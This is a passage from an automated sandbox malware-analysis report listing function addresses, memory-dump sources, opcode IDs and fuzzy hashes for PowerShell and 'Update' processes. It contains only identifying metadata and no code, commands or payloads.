                                                                                              • Source File: 0000000E.00000002.1704080574.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_7ffaac550000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6430fc851655bded5ee2340b1f47a1573975c2391a76f970af7071c5f21b3763
                                                                                              • Instruction ID: 03490f9650eb1052e6f1cb641efa4ac2da6b25c403096a6ceb240b8531f0f616
                                                                                              • Opcode Fuzzy Hash: 6430fc851655bded5ee2340b1f47a1573975c2391a76f970af7071c5f21b3763
                                                                                              • Instruction Fuzzy Hash: 1711E7729CE58A8FF694D71894585747BE4EF0121075980FEE04DC71A2DE1AEC488381
                                                                                              Function 00007FFAAC4833B5 Relevance: .0, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.1703130066.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_7ffaac480000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                              • Instruction ID: fa6fc882dfd95574baba5a2dd2e69265abbf835bfde3577d4f432220f6d2f2fa
                                                                                              • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                              • Instruction Fuzzy Hash: 4D01677111CB0C8FD744EF0CE451AB5B7E0FB95364F10056DE58AC3661DA36E892CB45

                                                                                              Executed Functions

                                                                                              Function 00007FFAAC56660A Relevance: .5, Instructions: 456COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.1934435599.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_16_2_7ffaac560000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e6d5bba1e9cd0b3f820bb784b70e13f3ee509b766c14879c2711660623983da1
                                                                                              • Instruction ID: 36de98be5f5d59e2ef8cce49a392fdb75ea63570d72b0c1cfb77993e3a936d0f
                                                                                              • Opcode Fuzzy Hash: e6d5bba1e9cd0b3f820bb784b70e13f3ee509b766c14879c2711660623983da1
                                                                                              • Instruction Fuzzy Hash: 7ED157B190EB8A8FF755977898159B5BBE4EF56310B0841BAE04DC71D3DE28EC0983D1
                                                                                              Function 00007FFAAC499770 Relevance: .1, Instructions: 137COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.1933269503.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_16_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fde64360c40c512be83656b81d77079b56236cffc6aa38e61c6d986f9a8125d7
                                                                                              • Instruction ID: 2f3dc73d5a69b7aa964aa6d17b2b07de4b221e73ce7fa3b35b5ed74e58329819
                                                                                              • Opcode Fuzzy Hash: fde64360c40c512be83656b81d77079b56236cffc6aa38e61c6d986f9a8125d7
                                                                                              • Instruction Fuzzy Hash: 4241FA7190CB888FE7589F5CA80A5B97FE0FBA5311F04816FE44DD3252CA64A859CBC6
                                                                                              Function 00007FFAAC37EE20 Relevance: .1, Instructions: 129COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.1924614382.00007FFAAC37D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC37D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_16_2_7ffaac37d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d06bc5c3f5b9554b7b78b7563cae95ebc1df416bd0f29a5ced28a33874407c63
                                                                                              • Instruction ID: 4d94fb5ccc9649611ca2ff9fe87b857786bdfbb0af9ab1cdc6b709843a24e271
                                                                                              • Opcode Fuzzy Hash: d06bc5c3f5b9554b7b78b7563cae95ebc1df416bd0f29a5ced28a33874407c63
                                                                                              • Instruction Fuzzy Hash: 2141037140EFC49FE756DB2898419527FF0EF57220B1906EFD088CB5A3D625E84AC7A2
                                                                                              Function 00007FFAAC49A49C Relevance: .1, Instructions: 99COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.1933269503.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_16_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 361d25d60e2833dfa44be2d4ea9c482d7db4ff0f2bbfefdf9e5d84e639f0c172
                                                                                              • Instruction ID: e0047e21a1716656bc2211b55c447ff6df1270ebc216f282252ea55426f5aea8
                                                                                              • Opcode Fuzzy Hash: 361d25d60e2833dfa44be2d4ea9c482d7db4ff0f2bbfefdf9e5d84e639f0c172
                                                                                              • Instruction Fuzzy Hash: D821093190C74C8FEB59DBAC984E6E97FE0EB96320F04816BD04CC3152D674A449C791
                                                                                              Function 00007FFAAC4933B5 Relevance: .0, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.1933269503.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_16_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                              • Instruction ID: 5910eff218ebdd6503179abbb95655a93dd30ac77fa8d77108b8420d4812b2c2
                                                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                              • Instruction Fuzzy Hash: A101677115CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E892CB45
                                                                                              Function 00007FFAAC49A0FB Relevance: .0, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.1933269503.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_16_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e16ce9f4544b61f83fc56c28ee4b371a5e0c76238163f634a26dcb7bde16a658
                                                                                              • Instruction ID: ec7f6e4edf52c0c663e0685a1b0d390778dcd7ac4da5b7a18f7b6d3d106a0143
                                                                                              • Opcode Fuzzy Hash: e16ce9f4544b61f83fc56c28ee4b371a5e0c76238163f634a26dcb7bde16a658
                                                                                              • Instruction Fuzzy Hash: C0F0F67741DB9C8FE745DB1CE86A4E97FA0FF66215B0442ABE04CC7162DA26984887C1
                                                                                              Function 00007FFAAC56414D Relevance: .0, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.1934435599.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_16_2_7ffaac560000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 39246e63b12ef90bace63248b6c9dbdebf59e69515dc4feabd6df8c7dd2b67b2
                                                                                              • Instruction ID: 367d2bba5e6e9697ac844488d13d926bf0fee8eb3e382db6da2ca6d572344e79
                                                                                              • Opcode Fuzzy Hash: 39246e63b12ef90bace63248b6c9dbdebf59e69515dc4feabd6df8c7dd2b67b2
                                                                                              • Instruction Fuzzy Hash: E0F0BE32A4D5498FE7A8EB5CE4458E8B3E4EF5532071580BAE05DC71A3DE35EC44C780
                                                                                              Function 00007FFAAC564400 Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.1934435599.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_16_2_7ffaac560000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: be7fb38a4ede624c396f7de3dced43d37661e974043db544a37885508b9bfcd6
                                                                                              • Instruction ID: 0444ac1e8811676fe4e3037daf0536b94ddfa6aa092536adae132a3c5d0bc81e
                                                                                              • Opcode Fuzzy Hash: be7fb38a4ede624c396f7de3dced43d37661e974043db544a37885508b9bfcd6
                                                                                              • Instruction Fuzzy Hash: 95F0BE32A4D5458FE755EB1CE0468A8B7E0EF0532171540B6E04DC70A3EB26EC44C790
                                                                                              Function 00007FFAAC5641D1 Relevance: .0, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.1934435599.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_16_2_7ffaac560000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                              • Instruction ID: 1da8f34a65741406df9eddd08b208f3b426c46e4f43b49e36b255a5874fb2c64
                                                                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                              • Instruction Fuzzy Hash: 44E01A31B4C809CFEAA8DB0CE0409E9B3E5EB9932171541B7E14EC7561DB32EC959BC0

                                                                                              Non-executed Functions

                                                                                              Function 00007FFAAC498BFA Relevance: 6.3, Strings: 5, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.1933269503.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_16_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: K_^5$K_^8$K_^F$K_^I$K_^K
                                                                                              • API String ID: 0-34091245
                                                                                              • Opcode ID: 7c895d8b487069c86b20a5dc5e8f101a428a195b65b8b1fd6ef1a3953e51fc56
                                                                                              • Instruction ID: eb53e693b4954688ab75967ef4b7aac7ecd888228fce8bd35d3999d051cb8d24
                                                                                              • Opcode Fuzzy Hash: 7c895d8b487069c86b20a5dc5e8f101a428a195b65b8b1fd6ef1a3953e51fc56
                                                                                              • Instruction Fuzzy Hash: 522149B76941265EDA013B7DF859DE877E4DF8427934983B2D198CF213DC14B08B8AC0
                                                                                              Function 00007FFAAC498945 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000010.00000002.1933269503.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_16_2_7ffaac490000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: K_^$K_^$K_^$K_^
                                                                                              • API String ID: 0-4267328068
                                                                                              • Opcode ID: 21b87b7a8023be6b5cc71783818115486986865fb7afdea286f84ead1f7c958b
                                                                                              • Instruction ID: bbab36b16415090d42dbbcfcc85eefef516be2356c0ec54357773c8f66c7554e
                                                                                              • Opcode Fuzzy Hash: 21b87b7a8023be6b5cc71783818115486986865fb7afdea286f84ead1f7c958b
                                                                                              • Instruction Fuzzy Hash: 2B3150D390E7D68FF3564668987A0A16FE0EF13619F0981F6C0888B597ED0D980A8296

                                                                                              Executed Functions

                                                                                              Function 00007FFAAC481E4E Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000016.00000002.2003679244.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_22_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r6
                                                                                              • API String ID: 0-2984296541
                                                                                              • Opcode ID: 1dc4d04b143d41bc92918a7a897ddae703b0c02705bec0498c7c3da48d182efa
                                                                                              • Instruction ID: bdd7f207506a7ef5807cf5f84f6e4be223ba63d5481ff9189c9b3fb94124a820
                                                                                              • Opcode Fuzzy Hash: 1dc4d04b143d41bc92918a7a897ddae703b0c02705bec0498c7c3da48d182efa
                                                                                              • Instruction Fuzzy Hash: 8B51D15160E7C50FE38697B898696657FE6DF8B220B0941FFE08DCB1A3CD594C0AC352
                                                                                              Function 00007FFAAC480EAE Relevance: .2, Instructions: 207COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000016.00000002.2003679244.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_22_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 64cd19b901479d11d8cf7e6c96bd0ae3185a7356a18671d7866b553bdd500377
                                                                                              • Instruction ID: 8b106fa62d01f8c9d3ee6f58f23821577cbb5663a4f728bca8ad064c20d45540
                                                                                              • Opcode Fuzzy Hash: 64cd19b901479d11d8cf7e6c96bd0ae3185a7356a18671d7866b553bdd500377
                                                                                              • Instruction Fuzzy Hash: FC513862A1E6C60FE356A73CD819AB93FD5DF87224B0981FBD08DC71A3DC189C468391
                                                                                              Function 00007FFAAC480650 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000016.00000002.2003679244.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_22_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r6
                                                                                              • API String ID: 0-2984296541
                                                                                              • Opcode ID: 5e2e2fb18612c8c61bca6f40040a7be22c6c66ff02d34da507bd2baa215032a7
                                                                                              • Instruction ID: 6a947490d059234ba40c6a3e8f9960a6636cf9cfee8c0ef7e5c39408bd8d4e49
                                                                                              • Opcode Fuzzy Hash: 5e2e2fb18612c8c61bca6f40040a7be22c6c66ff02d34da507bd2baa215032a7
                                                                                              • Instruction Fuzzy Hash: FF31D761B1C9494FE798EB7CD46A779B6C6EF99311F0406BEE04EC32A3DD149C018381
                                                                                              Function 00007FFAAC480D41 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000016.00000002.2003679244.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_22_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 6
                                                                                              • API String ID: 0-1452363761
                                                                                              • Opcode ID: e33d6a18200526ca7000b4ee207d44f6c1e27ae387d87aba3d888d2ebeed9e12
                                                                                              • Instruction ID: c4e4dd0f86e566c103a432fdc528993e36196bfdb1ee44be7191d676bc879ef6
                                                                                              • Opcode Fuzzy Hash: e33d6a18200526ca7000b4ee207d44f6c1e27ae387d87aba3d888d2ebeed9e12
                                                                                              • Instruction Fuzzy Hash: FE31B262B18A0A4FF784B7BCD81E7BDBBD5EF99311F1442B6E00DC3292DD2899418791
                                                                                              Function 00007FFAAC481739 Relevance: .5, Instructions: 532COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000016.00000002.2003679244.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_22_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3b0033311e9efcc96d6be4444c64e34267e6373de5376a1eb7f40be19f886463
                                                                                              • Instruction ID: 8b9f3a37316840eb0e5e2fd03f4b0a3242dd0b8259bee28879253bab3c1a123e
                                                                                              • Opcode Fuzzy Hash: 3b0033311e9efcc96d6be4444c64e34267e6373de5376a1eb7f40be19f886463
                                                                                              • Instruction Fuzzy Hash: 0302E361B29A498FEB84EB78C45DABD77E2EF99300F5444B9D40FC32D6DD28A90587C0
                                                                                              Function 00007FFAAC480790 Relevance: .2, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000016.00000002.2003679244.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_22_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 73ab0a3493dbef0555c8dfd4ac1774452f064b2a883ec42afa3394c2f448e3ae
                                                                                              • Instruction ID: 5ba0ef5637f12f304bb1daded9651f1eab5e528f3d9dc74c9a0a50e12f34bbee
                                                                                              • Opcode Fuzzy Hash: 73ab0a3493dbef0555c8dfd4ac1774452f064b2a883ec42afa3394c2f448e3ae
                                                                                              • Instruction Fuzzy Hash: DB514B62A8D6894FE340EB7CD4A9CFD3FA1EF8121475881B6D04BCB39BDD2465458784
                                                                                              Function 00007FFAAC480BFA Relevance: .1, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000016.00000002.2003679244.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_22_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 54c37cdc4a45d6335b84b5dd842b09ad71683d36de9ff082b1bacb3451c4d3c6
                                                                                              • Instruction ID: 0a57324d9ed4bd434dc424261b1d3d3056ec7a4f25465133a8c138feb51ab3be
                                                                                              • Opcode Fuzzy Hash: 54c37cdc4a45d6335b84b5dd842b09ad71683d36de9ff082b1bacb3451c4d3c6
                                                                                              • Instruction Fuzzy Hash: 8B31B571A58A4E8FEB44EB78C459AFDBBE2FF99300F644579D00AD3286CD34A945C780
                                                                                              Function 00007FFAAC480870 Relevance: .1, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000016.00000002.2003679244.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_22_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d521ab3b8c493f383f2ad2406601791779488d7dcbe0e6588d2efb9fda6a4b24
                                                                                              • Instruction ID: 0a9f5f0d33813f61de2e965b5e74a45d08dc6113dec242e25f688c736e2877b0
                                                                                              • Opcode Fuzzy Hash: d521ab3b8c493f383f2ad2406601791779488d7dcbe0e6588d2efb9fda6a4b24
                                                                                              • Instruction Fuzzy Hash: 9B31A6A169C6895FE345EF28D4A9CAD7FF2AF88200B9484E5D40BC739FDD246A008745
                                                                                              Function 00007FFAAC481652 Relevance: .1, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000016.00000002.2003679244.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_22_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9f27294497a5aa88cbf287fad3c77be2950b190fb6f5a4aa8417e6029f763cf2
                                                                                              • Instruction ID: dc8187a0526cb8647b45dcd9d7e11536f85812fb197f0a26398f542228d566d5
                                                                                              • Opcode Fuzzy Hash: 9f27294497a5aa88cbf287fad3c77be2950b190fb6f5a4aa8417e6029f763cf2
                                                                                              • Instruction Fuzzy Hash: BE119D62E5490E8BE744E798D8599FCBBF1FF49210F548276D01FF219ACE2829454784
                                                                                              Function 00007FFAAC482001 Relevance: .1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000016.00000002.2003679244.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_22_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b48fdcd82106ce9f280dedf69b4e0019a42a171eb98c117eda734eb45507c577
                                                                                              • Instruction ID: d87991dfbef1dc4c7da3679f03a86f042419f0f7cf46a2a7f7c05a7d21ab120f
                                                                                              • Opcode Fuzzy Hash: b48fdcd82106ce9f280dedf69b4e0019a42a171eb98c117eda734eb45507c577
                                                                                              • Instruction Fuzzy Hash: 5F01284080E7854FF755A738585D8766FE0DFA3255B0845BAE88DC6097DC089A45C3D6

                                                                                              Executed Functions

                                                                                              Function 00007FFAAC481E4E Relevance: 1.4, Strings: 1, Instructions: 194COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r6
                                                                                              • API String ID: 0-2984296541
                                                                                              • Opcode ID: ea64aa07748533294ce0c5b2db65c53f9f840eb9b8f781b932d422e085ddd412
                                                                                              • Instruction ID: 146d3f39ee0a1e6e1675eb0d701ce7f62c34fff1f8b567aa99d3b6417a11bd85
                                                                                              • Opcode Fuzzy Hash: ea64aa07748533294ce0c5b2db65c53f9f840eb9b8f781b932d422e085ddd412
                                                                                              • Instruction Fuzzy Hash: A851C15160E7C50FE786A7B898696657FE6DF8B220B0941FFE08DCB1A3CD594C0AC352
                                                                                              Function 00007FFAAC480EAE Relevance: .2, Instructions: 207COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9f34eccf4cd922b1dd065c97681c0eb547ff048f44a12075d06a9382a046b902
                                                                                              • Instruction ID: b0f52776921e11baa1b4bd3adea2b67161616bdc5cb63e03568317b217308e69
                                                                                              • Opcode Fuzzy Hash: 9f34eccf4cd922b1dd065c97681c0eb547ff048f44a12075d06a9382a046b902
                                                                                              • Instruction Fuzzy Hash: 16513762A1E6C60FE356A73CD819AB53FD5DF87224B0981FBD08DC71A3DC1898468391
                                                                                              Function 00007FFAAC480650 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: r6
                                                                                              • API String ID: 0-2984296541
                                                                                              • Opcode ID: b6a901334538ba74e901162ef96d22bab083ee0210aff9209d3e1d3460cf5b58
                                                                                              • Instruction ID: 5bdd70a6cda410f44751085501f6d32715294f5e43024e47e189a98b7fda29c4
                                                                                              • Opcode Fuzzy Hash: b6a901334538ba74e901162ef96d22bab083ee0210aff9209d3e1d3460cf5b58
                                                                                              • Instruction Fuzzy Hash: 6331D761B1C9494FE798EB7CD46A779B6C6EF99311F0406BEE04EC32A3DD149C418381
                                                                                              Function 00007FFAAC480D41 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 6
                                                                                              • API String ID: 0-1452363761
                                                                                              • Opcode ID: e33d6a18200526ca7000b4ee207d44f6c1e27ae387d87aba3d888d2ebeed9e12
                                                                                              • Instruction ID: c4e4dd0f86e566c103a432fdc528993e36196bfdb1ee44be7191d676bc879ef6
                                                                                              • Opcode Fuzzy Hash: e33d6a18200526ca7000b4ee207d44f6c1e27ae387d87aba3d888d2ebeed9e12
                                                                                              • Instruction Fuzzy Hash: FE31B262B18A0A4FF784B7BCD81E7BDBBD5EF99311F1442B6E00DC3292DD2899418791
                                                                                              Function 00007FFAAC481739 Relevance: .5, Instructions: 532COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b704a250e4ad7318c45f7eeda2c4f61b2e40b6d96982c707b0d695f46e5efdab
                                                                                              • Instruction ID: 2ca3a83873a2223a75be66742e89dea9b29c55b4a6eb6a2f10916c7dc4ff1e59
                                                                                              • Opcode Fuzzy Hash: b704a250e4ad7318c45f7eeda2c4f61b2e40b6d96982c707b0d695f46e5efdab
                                                                                              • Instruction Fuzzy Hash: 4102D361B29A098FE784F778C46DAB977A2EF89301F904879D40FC32D3DD28A94587C0
                                                                                              Function 00007FFAAC480790 Relevance: .2, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000017.00000002.2127995680.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_23_2_7ffaac480000_Update.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0cb9170c6c6681d6bb464bfb95909d2bd4d573a7ca711e72f426ec4cd8e57ec1
                                                                                              • Instruction ID: 8f90ddb718ee10801255f22865f6ec7e6fc419152b1d9b3d184caa68bb80ced3
                                                                                              • Opcode Fuzzy Hash: 0cb9170c6c6681d6bb464bfb95909d2bd4d573a7ca711e72f426ec4cd8e57ec1
